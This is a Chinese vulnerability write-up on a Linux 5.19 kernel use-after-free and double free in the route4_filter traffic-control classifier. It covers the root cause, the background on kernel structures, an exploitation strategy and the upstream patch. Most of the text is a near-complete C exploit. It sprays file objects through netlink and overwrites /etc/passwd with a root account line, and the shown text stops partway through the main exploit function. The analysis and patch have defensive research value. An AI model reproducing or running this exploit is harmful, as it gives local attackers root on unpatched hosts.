一
漏洞信息
1. 漏洞简述
2. 组件概述
route4_change()
,用于初始化和替换route4_filter
对象。使用handle
作为id来区分不同的route4_filter
,如果存在某个handle
之前已被初始化过(fold
变量非空),就会移除旧的filter
,添加新的filter
;否则直接添加新的filter
。3. 漏洞利用
route4_filter
对象从链表中删除和释放时的检查条件不一致,导致该对象被释放后仍存于链表中,后面可以触发 Double Free,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题。4. 漏洞影响
5. 解决方案
二
环境搭建
wget <https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz>
tar -xvf linux-5.19.1.tar.xz
make menuconfig
make x86_64_defconfig
make bzImage -j32
三
漏洞分析
1.前置知识
内核凭证 Credential
struct cred
):其中存放了一个 task 的权限信息,例如 GID、UID 等等。如果能任意修改一个低权限进程的 cred 结构体,那么我们就可以将该进程提权至高权限(例如 root)struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
} __randomize_layout;
struct file
):存放一个文件的部分权限信息,例如 read & write 权限等。如果一个低权限用户可以任意修改高权限文件(例如/etc/passwd
),那么同样也能造成提权的目的。struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
const struct file_operations *f_op;
/*
* Protects f_ep_links, f_flags.
* Must not be taken from IRQ context.
*/
spinlock_t f_lock;
enum rw_hint f_write_hint;
atomic_long_t f_count;
unsigned int f_flags;
fmode_t f_mode;
struct mutex f_pos_lock;
loff_t f_pos;
struct fown_struct f_owner;
const struct cred *f_cred;
struct file_ra_state f_ra;
u64 f_version;
#ifdef CONFIG_SECURITY
void *f_security;
#endif
/* needed for tty driver, and maybe others */
void *private_data;
#ifdef CONFIG_EPOLL
/* Used by fs/eventpoll.c to link all the hooks to this file */
struct list_head f_ep_links;
struct list_head f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
struct address_space *f_mapping;
errseq_t f_wb_err;
errseq_t f_sb_err; /* for syncfs */
} __randomize_layout
__attribute__((aligned(4))); /* lest something weird decides that 2 is OK */
struct file_handle {
__u32 handle_bytes;
int handle_type;
/* file identifier */
unsigned char f_handle[];
};
Slab 的两种内存缓存
dedicated cache(专用缓存)
:这里的内存是用于分配给内核中的常用对象,在该缓存中被分配的结构体将始终保持初始化状态,以便于提高分配速度generic cache(通用缓存)
:通用缓存,大多数情况下其内存块的大小与 2 的幂次方对齐cred
和file
结构体等credential
对象都是在dedicated cache
中分配,而大多数内存漏洞发生的地方都是在generic cache
中。sudo cat /proc/slabinfo
可以查看 slab 分配器的具体信息:generic cache
:在名称中带有kmalloc
dedicated cache
:拥有特殊的名字2.漏洞与利用
route4_filter
对象从链表中删除和释放时的检查条件不一致file
对象完成利用,也可以采用cred
对象)/tmp/x
,就会分配可写的file
对象,在通过写许可检查之后后,进行实际写操作之前暂停file
对象/etc/passwd
,就会分配新的file
对象,占据旧的file
对象,继续写入就能往只读文件写入内容(例如写入hacker:x:0:0:root:/:/bin/sh
就能提权)3.需要解决的问题
file object
的原语file object
,来置换先前被释放的低权限file object
4.对应的解决措施
1.置换内核凭证
request_key_auth->cred
)2.延长竞争窗口
credential
的替换需要一些时间,因此如果能延长这个竞争窗口,那就能非常成功的进行漏洞利用,其中Userfaultfd
和 FUSE
,这两种机制都允许用户无限延长竞争窗口。userfaultfd
允许一个线程管理其他线程所产生的Page Fault
事件,当某个线程触发了Page Fault
,该线程将立即睡眠,而其他线程则可以通过userfaultfd
来读取出这个Page Fault
事件,并进行处理handler
,来指定应对文件操作请求(可以在实际操作文件之前,执行handler
暂停内核执行,尽可能地延长窗口)3.分配特权对象
privilege credential
对象的分配时机,控制该对象的分配成为了一个关键点。Set-UID
程序(例如sudo
),或者频繁创建特权级守护进程(例如sshd
),从而创建privilege cred
结构体/etc/passwd
等特权文件kernel thread
时,当前kernel thread
将会被复制,这时其privileged cred
结构体也会被拷贝一份。kernel workqueue
中填充大量任务,动态创建新的kernel thread
来执行任务。usermode helper
(一种允许内核创建用户模式进程的机制),一种最常见的应用场所是加载内核模块至内核空间中。5.静态分析
route4_filter
对象:(大小为“144”,属于kmalloc-192
)struct route4_filter {
struct route4_filter __rcu *next;
u32 id;
int iif;
struct tcf_result res;
struct tcf_exts exts;
u32 handle;
struct route4_bucket *bkt;
struct tcf_proto *tp;
struct rcu_work rwork;
};
tcf_exts
对象的tc_action
条目:(包含32个tc_action
对象指针,属于kmalloc-256
)struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
__u32 type; /* for backward compat(TCA_OLD_COMPAT) */
int nr_actions;
struct tc_action **actions;
struct net *net;
#endif
/* Map to export classifier specific extension TLV types to the
* generic extensions API. Unsupported extensions must be set to 0.
*/
int action;
int police;
};
static int route4_change(struct net *net, struct sk_buff *in_skb,
struct tcf_proto *tp, unsigned long base, u32 handle,
struct nlattr **tca, void **arg, bool ovr,
bool rtnl_held, struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter __rcu **fp;
struct route4_filter *fold, *f1, *pfp, *f = NULL;
struct route4_bucket *b;
struct nlattr *opt = tca[TCA_OPTIONS];
struct nlattr *tb[TCA_ROUTE4_MAX + 1];
unsigned int h, th;
int err;
bool new = true;
if (opt == NULL)
return handle ? -EINVAL : 0;
err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
route4_policy, NULL);
if (err < 0)
return err;
fold = *arg; /* 现有的route4_filter对象 */
if (fold && handle && fold->handle != handle)
return -EINVAL;
err = -ENOBUFS;
f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* 分配新的route4_filter对象 */
if (!f)
goto errout;
err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* 进行初始化,为route4_filter->exts.action分配256字节的空间 */
if (err < 0)
goto errout;
if (fold) { /* 把旧的route4_filter对象中的数据填入新的route4_filter对象 */
f->id = fold->id;
f->iif = fold->iif;
f->res = fold->res;
f->handle = fold->handle;
f->tp = fold->tp;
f->bkt = fold->bkt;
new = false;
}
err = route4_set_parms(net, tp, base, f, handle, head, tb,
tca[TCA_RATE], new, ovr, extack); /* 初始化new filter */
if (err < 0)
goto errout;
/* 将new filter插入到list */
h = from_hash(f->handle >> 16);
fp = &f->bkt->ht[h];
for (pfp = rtnl_dereference(*fp);
(f1 = rtnl_dereference(*fp)) != NULL;
fp = &f1->next)
if (f->handle < f1->handle)
break;
tcf_block_netif_keep_dst(tp->chain->block);
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);
/* 若存在old filter,old handle不为"0",old new handle不同,则从list中移除 */
if (fold && fold->handle && f->handle != fold->handle) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);
if (b) {
fp = &b->ht[h]; /* ht存放的是route4_filter列表 */
for (pfp = rtnl_dereference(*fp); pfp;
fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
if (pfp == fold) {
rcu_assign_pointer(*fp, fold->next); /* 从链表中删除 */
break;
}
}
}
}
route4_reset_fastmap(head);
*arg = f;
if (fold) { /* 若存在old filter,释放old filter */
tcf_unbind_filter(tp, &fold->res);
tcf_exts_get_net(&fold->exts);
tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* 启动内核任务,调用route4_delete_filter_work释放old filter */
}
return 0;
errout:
if (f)
tcf_exts_destroy(&f->exts);
kfree(f);
return err;
}
handle
作为 ID 来区分不同的route4_filter
handle
之前已被初始化过(fold
变量非空),就会移除旧的filter
,添加新的filter
filter
route4_filter
对象从链表中删除和释放时的检查条件不一致:-
存在
old filter
-
old handle
不为 “0” -
old new handle
不同
-
存在
old filter
old handle == 0
,则不会在链表中删除但是会被释放,这就导致了一个 UAF6.利用思路
kmalloc-256 cache page
,将该页归还给页管理器,然后分配file
结构来复用该页(filp cache
)kmalloc-256
堆块,包含漏洞对象kmalloc-256
,以归还漏洞对象所在的页file
对象来占据漏洞对象(cross-cache attack)file
对象被释放)file
对象来替换低权限file
对象file
对象7.官方补丁
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);
- if (fold && fold->handle && f->handle != fold->handle) {
+ if (fold) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);
四
漏洞复现
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>
#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>
#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>
char* target = "/etc/passwd"; // overwrite the target file
char* overwrite = "hi:x:0:0:root:/:/bin/sh\\n"; // "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\\n"
char* global;
char* self_path;
char* content; // evil data + existing data in the target file
#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000
int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1; // unprivileged `file`
int overlap_b = -1; // privileged `file`
int cpu_cores = 0; // num of cpu cores
int sockfd = -1;
int spray_num_1 = 2000; // 4000
int spray_num_2 = 4000; // 5000
int pipe_main[2]; // notify process to excecute using pipe
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];
int run_write = 0; // let thread 2 begin to write evil data
int run_spray = 0; // let thread 3 begin to spray privileged `file`
bool overlapped = false;
void print_hex(char* buf, int size) {
int i;
puts("======================================");
printf("data :\\n");
for (i = 0; i < (size / 8); i++) {
if (i % 2 == 0) {
printf("%d", i / 2);
}
printf(" %16llx", *(size_t*)(buf + i * 8));
if (i % 2 == 1) {
printf("\\n");
}
}
puts("======================================");
}
// set cpu affinity
void pin_on_cpu(int cpu) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(cpu, &cpu_set);
if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
perror("sched_setaffinity()");
exit(EXIT_FAILURE);
}
}
static bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}
// setup working dir
static void use_temporary_dir(void) {
system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
system("touch exp_dir/data2");
char* tmpdir = "exp_dir";
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
symlink("./data", "./uaf");
}
// setup process memory
static void adjust_rlimit() {
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
// setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
// RLIMIT_FILE
rlim.rlim_cur = rlim.rlim_max = 14096;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { // RLIMIT_NOFILE 最大打开文件描述符限制,默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
rlim.rlim_cur = rlim.rlim_max = 4096;
spray_num_1 = 1200;
spray_num_2 = 2800;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
perror("[-] setrlimit");
err(1, "[-] setrlimit");
}
}
}
void setup_namespace() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\\n", real_uid)) {
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}
// set up process memory / working dir / namespace
void pre_exploit() {
adjust_rlimit();
use_temporary_dir();
setup_namespace();
}
#define NLMSG_TAIL(nmsg) \\
((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
// add attribute
int addattr(char* attr, int type, void* data, int len) {
struct rtattr* rta = (struct rtattr*)attr;
rta->rta_type = type;
rta->rta_len = RTA_LENGTH(len);
if (len)
memcpy(RTA_DATA(attr), data, len);
return RTA_LENGTH(len);
}
// add attribute (maxlen limitation)
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
int len = RTA_LENGTH(alen);
struct rtattr* rta;
if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\\n", maxlen);
return -1;
}
rta = NLMSG_TAIL(n);
rta->rta_type = type;
rta->rta_len = len;
if (alen)
memcpy(RTA_DATA(rta), data, alen);
n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
return 0;
}
struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
struct rtattr* nest = NLMSG_TAIL(n);
addattr_l(n, maxlen, type, NULL, 0);
return nest;
}
int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
nest->rta_len = (void*)NLMSG_TAIL(n) - (void*)nest;
return n->nlmsg_len;
}
// add_qdisc() —— setup the socket
int add_qdisc(int fd) {
char* start = malloc(0x1000);
memset(start, 0, 0x1000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;
// new qdisc nlmsghdr + tcmsg
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
msg->nlmsg_type = RTM_NEWQDISC;
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
// set local
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_parent = TC_H_ROOT;
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4); // sfq is not defaully configured, only qfq is configured
// print_hex(msg, msg->nlmsg_len);
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
return sendmsg(fd, &msgh, 0);
}
// spray 1 vulnerable object (filter) with customized flags
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
char* start = malloc(0x2000);
memset(start, 0, 0x2000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;
// new filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | flags;
msg->nlmsg_type = RTM_NEWTFILTER; // RTM_NEWTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4); // TCA_ROUTE4_FROM
addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4); // TCA_ROUTE4_TO
addattr_nest_end(msg, tail);
// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(fd, &msgh, 0);
free(start);
return 1;
}
void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag);
}
uint32_t calc_handle(uint32_t from, uint32_t to) {
uint32_t handle = to;
assert(from <= 0xff && to <= 0xff);
handle |= from << 16;
if (((handle & 0x7f00) | handle) != handle)
return 0;
if (handle == 0 || (handle & 0x8000))
return 0;
return handle;
}
void* delete_tc_(int sockfd, u_int32_t handle) {
char* start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;
// delete filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER; // RTM_DELTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);
// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(sockfd, &msgh, 0);
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);
if (msgh.msg_namelen != sizeof(nladdr))
printf("[-] size of sender address is wrong\\n");
return start;
}
void delete_tc(int sockfd, uint32_t handle) {
delete_tc_(sockfd, ((handle) << 8) + (handle));
}
// spray spray_count objects ???
int add_tc_basic(int fd, uint32_t handle, void* spray_data, size_t spray_len, int spray_count) {
assert(spray_len * spray_count < 0x3000);
char* start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;
// new filter nlmsghdr + tcmsg
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | flags;
msg->nlmsg_type = RTM_NEWTFILTER; // RTM_NEWTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;
addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
struct rtattr* tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
struct rtattr* ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
struct tcf_ematch_tree_hdr tree_hdr = { .nmatches = spray_count / 2,
.progid = 0 };
addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
struct rtattr* rt_match_tail = addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);
char* data = malloc(0x3000);
for (int i = 0; i < tree_hdr.nmatches; i++) {
char* current;
memset(data, 0, 0x3000);
struct tcf_ematch_hdr* hdr = (struct tcf_ematch_hdr*)data;
hdr->kind = TCF_EM_META;
hdr->flags = TCF_EM_REL_AND;
current = data + sizeof(*hdr);
struct tcf_meta_hdr meta_hdr = {
.left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
.right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
};
current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr));
current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);
addattr_l(msg, 0x4000, i + 1, data, current - data);
}
addattr_nest_end(msg, rt_match_tail);
addattr_nest_end(msg, ema_tail);
addattr_nest_end(msg, tail);
// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(fd, &msgh, 0);
free(data);
free(start);
return 1;
}
void* delete_tc_basic(int sockfd, u_int32_t handle) {
char* start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr* msg = (struct nlmsghdr*)start;
// delete filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER; // RTM_DELTFILTER
struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;
addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);
// packing
struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(sockfd, &msgh, 0);
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);
if (msgh.msg_namelen != sizeof(nladdr))
printf("[-] size of sender address is wrong\\n");
return start;
}
// slow_write() —— thread 1: occupy the write lock (write plenty of data)
void* slow_write() {
printf("[11-1] start slow write\\n");
clock_t start, end;
int fd = open("./uaf", 1);
if (fd < 0) {
perror("[-] error open uaf file");
exit(-1);
}
unsigned long int addr = 0x30000000;
int offset;
for (offset = 0; offset < 0x80000 / 20; offset++) { // mmap space [0x30000000, 0x30000000 + 0x1000 * 0x80000 / 20]
void* r = mmap((void*)(addr + offset * 0x1000), 0x1000,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r < 0)
printf("[-] allocate failed at 0x%x\\n", offset);
}
assert(offset > 0);
void* mem = (void*)(addr);
memcpy(mem, "hhhhh", 5);
struct iovec iov[20];
for (int i = 0; i < 20; i++) { // write plenty of data (0x80000 * 0x1000 = 0x80 000 000 = 2GB)
iov[i].iov_base = mem;
iov[i].iov_len = offset * 0x1000;
}
run_write = 1; // notifiy thread 2 (unprivileged `file`) begin to write evil data
start = clock();
if (writev(fd, iov, 20) < 0)
perror("slow write");
end = clock();
double spent = (double)(end - start) / CLOCKS_PER_SEC;
printf("[*] write done, spent %f s\\n", spent);
run_write = 0;
}
// write_cmd() —— thread 2: write evil data to the privileged file
void* write_cmd() {
struct iovec iov = { .iov_base = content, .iov_len = strlen(content) };
while (!run_write) {} // wait for thread 1 to prepare write
printf("[11-2] write evil data after the slow write\\n");
run_spray = 1;
if (writev(overlap_a, &iov, 1) < 0)
printf("[-] failed to write\\n");
}
void exploit() {
char msg[0x10] = {};
struct rlimit old_lim, lim, new_lim;
// Get old limits
if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
printf("Old limits -> soft limit= %ld \\t"
" hard limit= %ld \\n",
old_lim.rlim_cur, old_lim.rlim_max);
pin_on_cpu(0);
printf("[*] starting exploit, num of cores: %d\\n", cpu_cores);
// open & setup the socket
sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sockfd != -1);
add_qdisc(sockfd);
// 3. allocate a route4_filter (vulnerable object)
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");
printf("[3] allocate the vulnerable filter\\n");
add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE); // handle = 0
if (write(pipe_parent[1], "OK", 2) != 2)
err(1, "[-] write to child");
// 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");
// free the object, to free the slab
printf("[6] 1st freed the filter object\\n");
// getchar();
add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE); // handle = 0
// wait for the vulnerable object being freed
usleep(500 * 1000);
if (write(pipe_parent[1], "OK", 2) != 2)
err(1, "[-] write to child");
// 8. spray 4000 unprivileged `file`
if (read(pipe_child[0], msg, 2) != 2)
err(1, "[-] read from parent");
usleep(1000 * 1000);
printf("[8] spray 4000 uprivileged `file`\\n");
for (int i = 0; i < spray_num_1; i++) {
pin_on_cpu(i % cpu_cores);
fds[i] = open("./data2", 1);
assert(fds[i] > 0);
}
// printf("pause before 2nd free\\n");
// getchar();
// 9. 2nd free route4_filter, which will free the file
printf("[9] 2nd free the filter object\\n");
add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE); // handle = 0
printf("pause after 2nd free\\n");
// getchar();
// sleep(10000);
usleep(1000 * 100); // should not sleep too long, otherwise file might be claimed by others
// 10. spray 5000 unprivileged `file` & find the overlapped file
printf("[10] spraying 5000 unprivileged `file`\\n");
for (int i = 0; i < spray_num_2; i++) {
pin_on_cpu(i % cpu_cores);
fd_2[i] = open("./uaf", 1);
assert(fd_2[i] > 0);
for (int j = 0; j < spray_num_1; j++) {
// 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
{
printf("[10-1] found overlapped file, id : %d, %d\\n", i, j);
overlap_a = fds[j];
overlap_b = fd_2[i];
